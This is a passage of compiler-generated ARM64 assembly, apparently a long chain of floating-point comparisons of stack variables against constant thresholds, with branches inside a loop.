ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_292
LBB1_292: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-17.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_293
LBB1_293: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_295
b LBB1_294
LBB1_294: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-132]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_295
LBB1_295: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_296
LBB1_296: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_297
LBB1_297: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_298
LBB1_298: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_299
LBB1_299: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_300
LBB1_300: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_301
LBB1_301: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_302
LBB1_302: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_303
LBB1_303: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_304
LBB1_304: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_305
LBB1_305: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_306
LBB1_306: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_307
LBB1_307: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_308
LBB1_308: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_309
LBB1_309: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_310
LBB1_310: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-13.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_311
LBB1_311: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #96]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_312
LBB1_312: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-19.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_313
LBB1_313: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-112]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-7.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_315
b LBB1_314
LBB1_314: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldr s0, [sp, #116]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_315
LBB1_315: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_316
LBB1_316: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_317
LBB1_317: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_318
LBB1_318: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_319
LBB1_319: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_320
LBB1_320: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_321
LBB1_321: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_322
LBB1_322: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_323
LBB1_323: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_324
LBB1_324: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_325
LBB1_325: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_326
LBB1_326: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_327
LBB1_327: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_328
LBB1_328: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-128]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_329
LBB1_329: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_330
LBB1_330: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_331
LBB1_331: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_332
LBB1_332: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-88]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_333
LBB1_333: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_335
b LBB1_334
LBB1_334: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-84]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_335
LBB1_335: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_336
LBB1_336: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_337
LBB1_337: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_338
LBB1_338: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_339
LBB1_339: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_340
LBB1_340: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_341
LBB1_341: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_342
LBB1_342: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_343
LBB1_343: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_344
LBB1_344: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_345
LBB1_345: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_346
LBB1_346: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #104]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_347
LBB1_347: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_348
LBB1_348: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-80]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-3.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_349
LBB1_349: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #120]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-8.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_350
LBB1_350: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-9.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_351
LBB1_351: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-72]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-18.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_352
LBB1_352: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-12.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_353
LBB1_353: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_355
b LBB1_354
LBB1_354: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-136]
fcvt d2, s0
ldur s0, [x29, #-52]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-5.00000000
fcmp d0, d1
cset w8, ne
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_355
LBB1_355: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_356
LBB1_356: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_357
LBB1_357: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_358
LBB1_358: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_359
LBB1_359: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_360
LBB1_360: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_361
LBB1_361: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_362
LBB1_362: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_363
LBB1_363: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_364
LBB1_364: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-104]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d0, s0
fmov d1, #-1.00000000
fmadd d0, d1, d0, d2
fcmp d0, d1
cset w8, hi
mov w9, #0
str w9, [sp, #72] ; 4-byte Folded Spill
tbnz w8, #0, LBB1_454
b LBB1_365
LBB1_365: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #112]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-6.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_366
LBB1_366: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-56]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_367
LBB1_367: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-48]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-11.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_368
LBB1_368: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #136]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-14.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_369
LBB1_369: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #128]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-20.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_370
LBB1_370: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #144]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-4.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_371
LBB1_371: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-144]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-10.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_372
LBB1_372: ; in Loop: Header=BB1_8 Depth=1
ldr s0, [sp, #152]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
fmov d0, #-1.00000000
fmadd d0, d0, d1, d2
fmov d1, #-2.00000000
fcmp d0, d1
cset w8, eq
tbnz w8, #0, LBB1_375
b LBB1_373
LBB1_373: ; in Loop: Header=BB1_8 Depth=1
ldur s0, [x29, #-120]
fcvt d2, s0
ldur s0, [x29, #-60]
fcvt d1, s0
